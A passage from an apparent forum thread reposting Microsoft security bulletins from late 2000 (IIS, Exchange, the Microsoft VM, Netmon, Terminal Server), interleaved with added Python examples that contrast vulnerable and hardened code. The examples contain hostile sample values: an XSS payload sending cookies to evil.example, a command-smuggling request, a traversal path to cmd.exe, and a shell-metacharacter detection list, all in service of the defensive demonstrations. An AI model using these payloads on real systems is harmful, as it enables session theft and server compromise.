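    issued = cookies_sent_to(cookies, f"https://{site}/secure/account.asp")
    plaintext = cookies_sent_to(cookies, f"http://{site}/public/index.asp")
    return any(
        name in plaintext
        for name in issued
        if name.upper().startswith(SESSION_NAME_PREFIXES)
    )


if __name__ == "__main__":
    for label, header in (("unpatched", UNPATCHED_SET_COOKIE), ("hardened", HARDENED_SET_COOKIE)):
        print(label, "insecure:", insecure_session_cookies(header),
              "leaks in clear:", leaks_session_id_in_clear(header))
```

The same check can be run against a live server's response headers: any session cookie returned without Secure will be replayed by the browser on the first plaintext request to that host, which is exactly the exposure the bulletin describes.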
socalgal
10-25-2000, 07:39 PM
Microsoft Security Bulletin (MS00-081)
- --------------------------------------
Patch Available for New Variant of "VM File Reading" Vulnerability
Originally posted: October 25, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in the Microsoft(r) virtual machine (Microsoft VM)
that originally was discussed in Microsoft Security Bulletin
MS00-011. Like the original vulnerability, the new variant could
enable a malicious web site operator to read files from the computer
of a person who visited his site or read web content from inside an
intranet if the malicious site was visited by a computer from within
that intranet.
Frequently asked questions regarding this vulnerability and the
patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-081.asp
Issue
=====
The Microsoft VM is a virtual machine for the Win32(r) operating
environment. It runs atop Microsoft Windows(r) 95, 98, Me, Windows
NT(r) 4.0, and Windows 2000. It ships as part of each operating
system, and also as part of Microsoft Internet Explorer.
The version of the Microsoft VM that ships with Microsoft Internet
Explorer 4.x and Internet Explorer 5.x contains a security
vulnerability that could allow a Java applet to operate outside the
bounds set by the sandbox. A malicious user could write a Java
applet that could read - but not change, delete or add - files from
the computer of a person who visited his site or read web content
from inside an intranet if the malicious site is visited by a
computer from within that intranet.
The vulnerability at issue here is a new variant of the vulnerability
originally discussed in Microsoft Security Bulletin MS00-011. The
only significant difference between the new and original variants
lies in the specific programming technique used to exploit the
vulnerability; in other respects, the two are virtually identical.
Applying the new patch eliminates both the new and original
variants.
Affected Software Versions
==========================
Versions of the Microsoft VM are identified by build numbers, which
can be determined using the JVIEW tool, as discussed in the FAQ. The
following builds of the Microsoft VM are affected:
- All builds in the 2000 series.
- All builds in the 3000 series.
Note: The Microsoft VM ships as part of several products. However,
the primary ship vehicle is Internet Explorer.
Patch Availability
==================
New versions of the Microsoft VM that include a fix for the
vulnerability can be downloaded from the following locations:
- 2000-series builds:
A patch specifically for the 2000-series builds will be available
shortly. Customers who wish to eliminate the vulnerability can
also do so by upgrading to build 3319 at
http://www.microsoft.com/java/vm/dl_vm40.htm
- 3000-series:
Upgrade to build 3319 or later at
http://www.microsoft.com/java/vm/dl_vm40.htm.
Note: 2000-series builds are shipped as part of Internet Explorer
4.x; 3000 series builds are shipped as part of Internet Explorer
5.x. However, customers may upgrade the Microsoft VM on their
machines independent of the browser, and the Microsoft VM also ships
as part of many other applications, so it is possible for the actual
build number to be higher than the one associated with the version
of IE that is installed on the machine. In such cases, customers
should determine what version of the patch to install based on the
build number, not on the version of IE.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-081,
http://www.microsoft.com/technet/security/bulletin/fq00-081.asp
- Microsoft Security Bulletin MS00-011,
http://www.microsoft.com/technet/security/bulletin/ms00-011.asp.
- Microsoft Knowledge Base article Q277014 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- October 25, 2000: Bulletin Created.
socalgal
10-31-2000, 06:02 PM
Microsoft Security Bulletin (MS00-082)
- --------------------------------------
Patch Available for "Malformed MIME Header" Vulnerability
Originally posted: October 31, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Exchange Server 5.5. The vulnerability
could enable a malicious user to cause an Exchange server to fail.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-082.asp
Issue
=====
As part of its normal processing of incoming mails, Exchange server
checks for invalid values in the MIME header fields. However, if a
particular type of invalid value is present in certain fields, the
Exchange service will fail. Normal operations can be restored by
restarting the Exchange service and deleting the offending mail.
There is no capability via this vulnerability to add, delete or
modify emails, nor is there any capability to usurp administrative
privileges on the server. The vulnerability can be eliminated either
by applying the patch or Exchange 5.5 Service Pack 4, which is due to
be released shortly. Exchange 2000 is not affected by the
vulnerability.
Affected Software Versions
==========================
- Microsoft Exchange Server 5.5
Note: Exchange Server 2000 is not affected by the vulnerability.
Patch Availability
==================
- Microsoft Exchange Server 5.5:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25443
Note: This patch can be applied atop systems running Exchange Server
5.5 Service Pack 3. It is included in Exchange Server 5.5 Service
Pack 4.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-082,
http://www.microsoft.com/technet/security/bulletin/fq00-082.asp
- Microsoft Knowledge Base article Q275714 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
===============
Microsoft thanks Art Savelev http://www.savelev.com for reporting
this issue to us and working with us to protect customers.
Revisions
=========
- October 31, 2000: Bulletin Created.
socalgal
11-01-2000, 06:52 PM
Microsoft Security Bulletin (MS00-083)
- --------------------------------------
Patch Available for "Netmon Protocol Parsing" Vulnerability
Originally posted: November 01, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows NT(r) and Windows(r) 2000
server products and Systems Management Server. The vulnerability
could allow a malicious user to gain control of an affected server.
Frequently asked questions regarding this vulnerability and
the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-083.asp
Issue
=====
Microsoft ships two versions of Network Monitor (Netmon): a basic
version that ships with Windows NT 4.0 and Windows 2000 server
products, and a full version that ships as part of Systems Management
Server (SMS) 1.2 and 2.0. Both versions include protocol parsers that
aid administrators in interpreting and analyzing previously-captured
network data. However, several of the parsers have unchecked buffers.
If a malicious user delivered a specially-malformed frame to a server
that was monitoring network traffic, and the administrator parsed it
using an affected parser, it would have the effect of either causing
Netmon to fail or causing code of the malicious user's choice to run
on the machine.
Netmon requires administrative privileges to run, but should only be
run by local, rather than domain, administrators. If this is done,
the vulnerability could be used to gain complete control over the
local machine, but could not be used to gain control over a domain.
Netmon does not ship on workstation products, so unless SMS had been
installed on a workstation, it would not be affected by this
vulnerability.
Affected Software Versions
==========================
- Microsoft Windows NT 4.0 Server
- Microsoft Windows NT 4.0 Server, Terminal Server Edition
- Microsoft Windows NT 4.0 Server, Enterprise Edition
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Systems Management Server 1.2
- Microsoft Systems Management Server 2.0
Note: Netmon does not ship as part of Windows NT 4.0 Workstation or
Windows 2000 Professional. These products would only be affected if
SMS had been installed on them.
Patch Availability
==================
- Microsoft Windows NT 4.0 Server and Windows NT 4.0 Server,
Enterprise Edition:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25487
- Microsoft Windows NT 4.0 Server, Terminal Server Edition:
To be released shortly.
- Microsoft Windows 2000 Server, Advanced Server and
Datacenter Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25485
- Microsoft Systems Management Server 1.2:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25505
- Microsoft Systems Management Server 2.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25514
Note: Customers who are running SMS should apply the SMS patch,
regardless of the platform they are running on. Customers who are not
running SMS but are using an affected server should apply the
operating system patch.
Note:
- The patch for Windows NT 4.0 Server and Windows NT 4.0 Server,
Enterprise Edition, should be applied atop Service Pack 6a.
It will be included in Service Pack 7.
- The patch for Windows NT 4.0 Server, Terminal Server Edition,
should be applied atop Service Pack 6. It will be included in
Service Pack 7.
- The patch for Windows 2000 can be applied to computers running
Windows 2000 "Gold" or Service Pack 1. It will be included in
Windows Service Pack 2.
- The patch for SMS 1.2 should be applied atop SMS 1.2 Service
Pack 4.
- The patch for SMS 2.0 can be applied to SMS 2.0 Gold, Service
Pack 1, or Service Pack 2. It will be included in Service Pack 3.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-083,
http://www.microsoft.com/technet/security/bulletin/fq00-083.asp
- Microsoft Knowledge Base article Q274835 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks COVERT Labs at PGP Security, Inc.
http://www.pgp.com/ , and the ISS X-force http://xforce.iss.net/
for reporting this issue to us and working with us to protect
customers.
Revisions
=========
- November 01, 2000: Bulletin Created.
socalgal
11-02-2000, 06:52 PM
Microsoft Security Bulletin (MS00-084)
- --------------------------------------
Patch Available for "Indexing Services Cross Site Scripting"
Vulnerability
Originally posted: November 02, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Indexing Services for Windows 2000.
This vulnerability could allow a malicious web site operator to
misuse another web site as a means of attacking users.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-084.asp
Issue
=====
On February 20, 2000, Microsoft and the CERT Coordination Center
published information on a newly-identified security vulnerability
affecting all web server products. This vulnerability, known as
Cross-Site Scripting (CSS), results when web applications don't
properly validate inputs before using them in dynamic web pages. If a
malicious web site operator were able to lure a user to his site, and
had identified a third-party web site that was vulnerable to CSS, he
could potentially use the vulnerability to "inject" script into a web
page created by the other web site, which would then be delivered to
the user. The net effect would be to cause the malicious user's
script to run on the user's machine using the trust afforded the
other site.
The vulnerability can affect any software that runs on a web server,
accepts user input, and uses it to generate web pages without
sufficient validation. Microsoft has identified an Indexing Service
component (CiWebHitsFile) that, when called from a specially crafted
URL, is vulnerable to this scenario.
Affected Software Versions
==========================
- Microsoft Indexing Services for Windows 2000
NOTE: The Indexing Service ships and installs with Windows 2000, but
is not enabled by default. Users who are running web servers on
Windows 2000 who have enabled Indexing Services are urged to apply
this patch.
Patch Availability
==================
- Indexing Services for Windows 2000:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25517
NOTE: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-084,
http://www.microsoft.com/technet/security/bulletin/fq00-084.asp
- Information on Cross-Site Scripting Security Vulnerability,
http://www.microsoft.com/technet/security/crssite.asp.
- CERT(r) Advisory CA-2000-02: Malicious HTML Tags Embedded in
Client Web Requests,
http://www.cert.org/advisories/CA-2000-02.html
- Microsoft Knowledge Base article Q278499 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- November 02, 2000: Bulletin Created.
socalgal
11-02-2000, 10:03 PM
Microsoft Security Bulletin (MS00-060)
- --------------------------------------
Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
Originally posted: August 25, 2000
Updated: November 2, 2000
Summary
=======
On August 25, 2000, Microsoft released the original version of this
bulletin, to advise customers of the availability of a patch that
eliminates a vulnerability in Microsoft(r) Internet Information
Server. However, an additional variant of the vulnerability was
subsequently identified, and on November 2, 2000, the bulletin was
updated to advise customers of the availability of an updated patch.
The scope of the new vulnerability is exactly the same as that of the
originally-reported one. The updated patch eliminates all known
variants of the vulnerability. Customers who applied the original
version of the patch should apply the new version to ensure that they
are fully protected.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-060.asp
Issue
=====
On February 20, 2000, Microsoft and CERT published information on a
newly-identified security vulnerability affecting all web server
products. This vulnerability, known as Cross-Site Scripting (CSS),
results when web applications don't properly validate inputs before
using them in dynamic web pages. If a malicious web site operator
were able to lure a user to his site, and had identified a
third-party web site that was vulnerable to CSS, he could potentially
use the vulnerability to "inject" script into a web page created by
the other web site, which would then be delivered to the user. The
net effect would be to cause the malicious user's script to run on
the user's machine using the trust afforded the other site.
The vulnerability can affect any software that runs on a web server,
accepts user input, and blindly uses it to generate web pages.
Microsoft recommended that all vendors check their products to see if
any are affected by the vulnerability, and initiated a check of its
own products as well. Several features in IIS were found to be
affected - some were found by Microsoft internal teams, and others
were identified by customers - and this patch eliminates all of them.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Server 5.0
Patch Availability
==================
- Internet Information Server 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25534
- Internet Information Server 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25533
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-060,
http://www.microsoft.com/technet/security/bulletin/fq00-060.asp
- Information on Cross-Site Scripting Security Vulnerability,
http://www.microsoft.com/technet/security/crssite.asp.
- CERT(r) Advisory CA-2000-02: Malicious HTML Tags Embedded in
Client Web Requests,
http://www.cert.org/advisories/CA-2000-02.html
- Microsoft Knowledge Base article Q260347 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Peter Grundl of Defcom http://www.defcom.com for
reporting the new variant of this issue to us and working with us to
protect customers.
Revisions
=========
- August 25, 2000: Bulletin Created.
- November 2, 2000: Bulletin updated to announce availability of a
patch to eliminate a new variant of this issue.
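MS00-084 and MS00-060 both describe the same defect: request input written into a generated page without validation. The Python below is an added example, not code from either bulletin and not the CiWebHitsFile or IIS code itself, showing a vulnerable page renderer beside a hardened one that encodes for the HTML text context and the URL attribute context separately. The page template, the query strings and the hostname in the payload are constructed for the example.

```python
"""Reflected input in a generated page: verbatim splicing vs context-aware encoding."""
import html
from urllib.parse import quote

# Constructed inputs. The hostile one is a generic cookie-stealing payload, not the
# specific URL the bulletins refer to (those details are not on the page).
HOSTILE_QUERY = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
BENIGN_QUERY = "quarterly report"

# Hypothetical page template: the search term appears in a text node and in an href.
PAGE = """<html><body>
<p>Results for: {term}</p>
<a href="/search?q={href}">search again</a>
</body></html>"""


def render_unsafe(query):
    """Vulnerable: the request parameter is spliced into the page verbatim, so markup
    and script in the parameter become markup and script in the delivered page."""
    return PAGE.format(term=query, href=query)


def render_safe(query):
    """Hardened: HTML-encode for the text context (quotes included, so the same
    function is safe inside attributes) and percent-encode for the URL context."""
    return PAGE.format(term=html.escape(query, quote=True), href=quote(query, safe=""))


def contains_live_script(page):
    """Check used by the example: does the markup still contain an un-encoded <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("unsafe renders live script:", contains_live_script(render_unsafe(HOSTILE_QUERY)))
    print("safe renders live script:  ", contains_live_script(render_safe(HOSTILE_QUERY)))
    print(render_safe(HOSTILE_QUERY))
```

The point of the two encoders is that one routine does not fit every context: text inside a tag needs entity encoding, a value inside a URL needs percent-encoding, and a value that lands in both needs each applied where it is used.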
socalgal
11-03-2000, 04:57 AM
Microsoft Security Bulletin (MS00-085)
- --------------------------------------
Patch Available for "ActiveX Parameter Validation" Vulnerability
Originally posted: November 2, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows 2000. The vulnerability could
enable a malicious user to potentially run code on another user's
machine.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-085.asp
Issue
=====
An ActiveX control that ships as part of Windows 2000 contains an
unchecked buffer. If the control was called from a web page or HTML
mail using a specially-malformed parameter, it would be possible to
cause code to execute on the machine via a buffer overrun. This could
potentially enable a malicious user to take any desired action on the
user's machine, limited only by the permissions of the user.
The vulnerability could only be exploited if ActiveX controls are
enabled in IE, Outlook or Outlook Express. The Security Zones feature
in IE enables customers to limit what web sites can do, and customers
who have used the feature to prevent untrusted sites from invoking
ActiveX controls would be at minimal risk from the web-based attack
scenario. Customers who have applied the Outlook Security Update
would be protected against the mail-borne scenario, since it moves
mail into the Restricted Sites Zone, thereby preventing HTML mails
from invoking ActiveX controls.
Affected Software Versions
==========================
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-085,
http://www.microsoft.com/technet/security/bulletin/fq00-085.asp
- Microsoft Knowledge Base article Q278511 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks USSR Labs http://www.ussrback.com for reporting
this issue to us and working with us to protect customers.
Revisions
=========
- November 2, 2000: Bulletin Created.
socalgal
11-06-2000, 06:35 PM
Microsoft Security Bulletin (MS00-086)
- --------------------------------------
Patch Available for "Web Server File Request Parsing" Vulnerability
Originally posted: November 06, 2000
Summary
=======
Microsoft has released a patch that eliminates a serious security
vulnerability in Microsoft(r) Internet Information Services 5.0. The
vulnerability could enable a malicious user to run operating system
commands on an affected web server.
Microsoft strongly urges all customers using IIS 5.0 to apply the
patch immediately. IIS 4.0 is not affected by the vulnerability.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-086.asp
Issue
=====
When IIS receives a valid request for an executable file, it passes
the name of the requested file to the underlying operating system
for processing. However, due to an implementation flaw in IIS 5.0, it
is possible to create a specially-malformed file request that
contains both a file name and one or more operating system commands.
Upon receiving such a request, IIS 5.0 would pass the entire string
to the operating system, which would first process the file and then
execute the commands. The file would need to reside in a folder to
which the user had execute permissions, but it would not necessarily
need to be an executable file.
The ability to execute operating system commands on the web server
would enable a malicious user to take virtually any action that an
interactively-logged on user could take. Although this would not give
the malicious user administrative control over the server, it would
nevertheless enable him to cause widespread damage. He could, for
instance, add, delete or change files on the server, run code that
was already on the server, or upload code of his choice and run it.
Microsoft strongly recommends that all customers running IIS 5.0
immediately apply the patch for this vulnerability. The patch also
eliminates the "Web Server Directory Traversal" vulnerability
discussed in Microsoft Security Bulletin MS00-078. IIS 4.0 is not
affected by the vulnerability, and IIS 4.0 customers do not need to
take any action.
Affected Software Versions
==========================
- Microsoft Internet Information Service 5.0
Note: IIS 4.0 is not affected by the vulnerability.
Note: This patch can be applied atop systems running either Windows
2000 Gold or Service Pack 1. It will be included in Windows 2000
Service Pack 2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-086,
http://www.microsoft.com/technet/security/bulletin/fq00-086.asp
- Microsoft Knowledge Base article Q277873 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks NSFocus http://www.nsfocus.com for reporting this
issue to us and working with us to protect customers.
Revisions
=========
- November 06, 2000: Bulletin Created.
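The MS00-086 description above, a request string that carries a file name plus operating system commands and is handed to the operating system whole, is the classic command injection pattern. The Python below is an added example, not IIS code and not the exploit string NSFocus reported (which is not on the page). It contrasts a dispatcher that splices the decoded request into one shell command line with one that confines the request to a named execute directory, restricts the file name to an allow-list of characters, and hands the file to the OS as a single argv element with no shell. The web root, the execute directory, the request paths and the metacharacter list are constructed for the example.

```python
"""Vulnerable vs hardened dispatch of a web request to an on-disk executable."""
import posixpath
import re
import subprocess
from urllib.parse import unquote

# Hypothetical server layout for the example (not IIS's paths or code).
WEB_ROOT = "/var/www"
EXECUTE_DIRS = ("/scripts",)               # virtual directories with execute permission
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")  # what a file name may contain
METACHARS = set('&|;`$<>"\'\n')            # shell separators and substitution characters

# Constructed request paths. The hostile one smuggles a command after the file name;
# it is a generic illustration, not the MS00-086 request.
BENIGN_REQUEST = "/scripts/report.bat"
HOSTILE_REQUEST = "/scripts/report.bat%26%20whoami"  # decodes to '/scripts/report.bat& whoami'
TRAVERSAL_REQUEST = "/scripts/../winnt/system32/cmd.exe"


def build_command_unsafe(request_path):
    """Flawed: decode the request and splice it into a command line for the shell.
    Everything after the file name reaches the shell intact, so the shell runs the
    file and then the appended command, which is the behaviour the bulletin describes."""
    return WEB_ROOT + unquote(request_path)


def run_unsafe(request_path):
    """What the flawed server would do with the string (never call on untrusted input)."""
    return subprocess.run(build_command_unsafe(request_path), shell=True)


def build_command_safe(request_path):
    """Hardened: validate the name, confine it to an execute directory, return argv.
    The resolved path is one argv element and no shell parses the request string.
    Existence and permission checks are left to the real server."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        raise ValueError("NUL byte in request")
    normalized = posixpath.normpath(decoded)      # collapses '..' before the check
    directory, name = posixpath.split(normalized)
    if directory not in EXECUTE_DIRS:
        raise ValueError(f"{directory!r} is not an execute directory")
    if not SAFE_NAME.match(name):
        raise ValueError(f"illegal characters in file name {name!r}")
    return [WEB_ROOT + normalized]


def run_safe(request_path):
    """Run the validated file with shell=False; argv elements are never re-parsed."""
    return subprocess.run(build_command_safe(request_path), shell=False)


def is_rejected(request_path):
    """True if the hardened builder refuses the request."""
    try:
        build_command_safe(request_path)
    except ValueError:
        return True
    return False


def shell_metacharacters(request_path):
    """Detection aid for logs or a proxy: metacharacters present after URL decoding."""
    return sorted(METACHARS & set(unquote(request_path)))


if __name__ == "__main__":
    print("unsafe command line:", build_command_unsafe(HOSTILE_REQUEST))
    print("hardened argv:", build_command_safe(BENIGN_REQUEST))
    print("hostile rejected:", is_rejected(HOSTILE_REQUEST),
          "metachars:", shell_metacharacters(HOSTILE_REQUEST))
```

Two properties do the work in the hardened version: the request is decoded exactly once before any check, and the file reaches the OS as an argument vector rather than as text for a command interpreter to split.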
socalgal
11-09-2000, 05:01 PM
Microsoft Security Bulletin (MS00-087)
- --------------------------------------
Patch Available for "Terminal Server Login Buffer Overflow"
Vulnerability
Originally posted: November 08, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows NT 4.0 Terminal Server. The
vulnerability could allow a malicious user to cause the Terminal
Server to fail or, in certain instances, to execute hostile code on
the server.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-087.asp
Issue
=====
An unchecked buffer in the Terminal Server login prompt could allow a
malicious user to cause the Terminal Server to execute arbitrary
code. The ability to execute arbitrary code would enable the
malicious user to add, change, or delete data, run code already on
the server, or upload new code to the server and run it. The
malicious user would not need to successfully login to the Terminal
Server in order to initiate this attack.
This vulnerability could be exploited remotely if connection requests
are not filtered. By default, Terminal Server listens on tcp port
3389. This port should be blocked at the firewall and/or router if
Terminal Server access from the Internet is not required.
Affected Software Versions
==========================
- Microsoft Windows NT 4.0 Terminal Server
Patch Availability
==================
- Microsoft Windows NT 4.0 Terminal Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25565
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-087
http://www.microsoft.com/technet/security/bulletin/fq00-087.asp
- Microsoft Knowledge Base article Q277910 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Bruno Acselrad of CORE SDI http://www.core-sdi.com for
reporting this issue to us and working with us to protect customers.
Revisions
=========
- November 08, 2000: Bulletin Created.
socalgal
11-16-2000, 07:50 PM
Microsoft Security Bulletin (MS00-088)
- --------------------------------------
Patch Available for "Exchange User Account" Vulnerability
Originally posted: November 16, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Exchange 2000 Server and Exchange 2000
Enterprise Server. This vulnerability could potentially allow an
unauthorized user to remotely login to an Exchange 2000 server and
possibly other servers on the affected computer's network.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-088.asp
Issue
=====
In early shipments of Exchange 2000, setup creates an account with a
known username and password. If a malicious user learned the username
and password, he or she could log onto the account. Under normal
circumstances, this account only has local user rights - it is not a
privileged account and cannot access Exchange 2000 data. However, if
Exchange 2000 were installed on a Domain Controller, the account
would also have Domain user privileges, and could thus gain access to
other resources in the affected Domain. Nevertheless, he would still
be restricted from accessing Exchange 2000 data.
To eliminate the security vulnerability, Microsoft has provided a
manual procedure, discussed in the FAQ, and a tool to protect our
customers. Microsoft also recommends that customers affected by this
vulnerability disable or delete this account after setup completes.
In addition, Exchange 2000 SP1 will contain a fix that removes this
vulnerability.
Affected Software Versions
==========================
- Microsoft Exchange 2000 Server CDs without "Rev. A" stamped on the
CD on the line below the Part No.
- Microsoft Exchange 2000 Enterprise Server CDs without "Rev. A"
stamped on the CD below the Part No.
Note: This also applies to evaluation editions and to Microsoft
Exchange 2000 Server and Microsoft Exchange 2000 Enterprise Server
included on the October 2000 Select CDs.
Patch Availability
==================
- The Tool can be downloaded from:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25866
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-088,
http://www.microsoft.com/technet/security/bulletin/fq00-088.asp
- Microsoft Knowledge Base (KB) article Q278523,
http://www.microsoft.com/technet/support/kb.asp?ID=278523
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- November 16, 2000: Bulletin Created.
socalgal
11-20-2000, 06:45 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Patch Available for "Session ID Cookie Marking" Vulnerability
Originally posted: October 23, 2000
Updated: November 20, 2000
Summary
=======
On October 23, 2000, Microsoft released the original version of this
bulletin, to discuss the availability of a patch that eliminates a
security vulnerability in Microsoft(r) Internet Information Server.
The vulnerability could allow a malicious user to "hijack" another
user's secure web session, under a very restricted set of
circumstances.
On November 20, 2000, we re-released the bulletin to advise customers
using IIS 4.0 on Alpha platforms, or IIS 5.0 on x86 platforms, that
new versions of these patches are available, to correct an error in the
original version of the patch. The x86 IIS 4.0 patch was not affected
by the error, and customers using these systems do not need to take
any action.
Frequently asked questions regarding this vulnerability and
the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-080.asp
Issue
=====
IIS supports the use of a Session ID cookie to track the current
session identifier for a web session. However, .ASP in IIS does not
support the creation of secure Session ID cookies as defined in RFC
2109. As a result, secure and non-secure pages on the same web site
use the same Session ID. If a user initiated a session with a secure
web page, a Session ID cookie would be generated and sent to the
user, protected by SSL. But if the user subsequently visited a
non-secure page on the same site, the same Session ID cookie would be
exchanged, this time in plaintext. If a malicious user had complete
control over the communications channel, he could read the plaintext
Session ID cookie and use it to connect to the user's session with
the secure page. At that point, he could take any action on the
secure page that the user could take.
The conditions under which this vulnerability could be exploited are
rather daunting. The malicious user would need to have complete
control over the other user's communications with the web site. Even
then, the malicious user could not make the initial connection to the
secure page - only the legitimate user could do that. The patch
eliminates the vulnerability by adding support for secure Session ID
cookies in .ASP pages. (Secure cookies already are supported for all
other types of cookies, under all other technologies in IIS).
The original version of patches for IIS 4.0 Alpha and the IIS 5.0
systems did not install correctly. The IIS 4.0 x86 version of the
patch does install correctly.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Services 5.0
Patch Availability
==================
- IIS 4.0:
x86 platforms:
http://www.microsoft.com/ntserver/nts/downloads/critical/q274149
Alpha platforms:
Available from Microsoft Product Support Services
- IIS 5.0:
http://www.microsoft.com/Windows2000/downloads/critical/q274149
Note: The patch installs support for secure Session ID cookies, but
does not enable it for reasons of application compatibility. As
discussed in the Knowledge Base article, it can be enabled or
disabled on a site-by-site basis.
Note:
- The IIS 4.0 version of this patch can be installed on Windows
NT 4.0 systems running Service Pack 6a, and will be included
in Service Pack 7.
- The IIS 5.0 version of this patch can be installed on Windows
2000 systems with or without Service Pack 1, and will be
included in Service Pack 2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-080,
http://www.microsoft.com/technet/security/bulletin/fq00-080.asp
- Microsoft Knowledge Base article Q274149 discusses this issue
and will be available soon.
- RFC 2109, HTTP State Management,
